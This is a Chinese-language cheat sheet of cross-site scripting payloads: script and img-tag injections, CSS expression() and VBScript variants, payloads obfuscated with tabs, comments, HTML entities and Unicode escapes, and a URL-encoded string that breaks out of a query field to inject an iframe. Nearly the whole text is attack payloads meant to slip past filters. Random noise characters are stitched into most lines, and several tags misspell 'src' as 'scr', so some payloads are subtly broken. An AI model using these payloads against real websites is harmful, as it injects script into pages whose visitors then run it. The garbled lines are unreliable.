<script>alert("跨站")</script> (最常用)
8 R I8 `+ P. g* ~. Q6 ?<img scr=javascript:alert("跨站")></img> z; Y; b) n+ z! W
<img scr="javascript: alert(/跨站/)></img>
: B% Y. B C: b<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
% g: t& P5 \( B<img scr="#" onerror=alert(/跨站/)></img>
# V8 H- p. Z# S% u# z1 A* X. n ^( N<img scr="#" style="xss:expression(alert(/xss/));"></img>
5 F+ @0 g0 K, z# M+ f; m<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 Q4 ~5 {6 t2 r<img src=vbscript:msgbox ("xss")></img>+ w& y1 |0 R9 ]& K
<style> input {left:expression (alert('xss'))}</style> L& \* W; r# K3 v! Z; z. r; i
<div style={left:expression (alert('xss'))}></div>
) J0 g% r& o8 d3 J. |6 j% _<div style={left:exp/* */ression (alert('xss'))}></div>; C9 _- v, k! r5 l5 A% O
<div style={left:\0065\0078ression (alert('xss'))}></div>* y: J1 H: h8 _$ X w
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
% ^9 R9 `) `$ ?unicode <div style="{left:expRessioN (alert('xss'))}">
; |- X- ^* B% ~3 F3 [
q1 O7 i3 v3 e0 k"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
4 O- l" Q, j* j4 e U4 ?3 [ |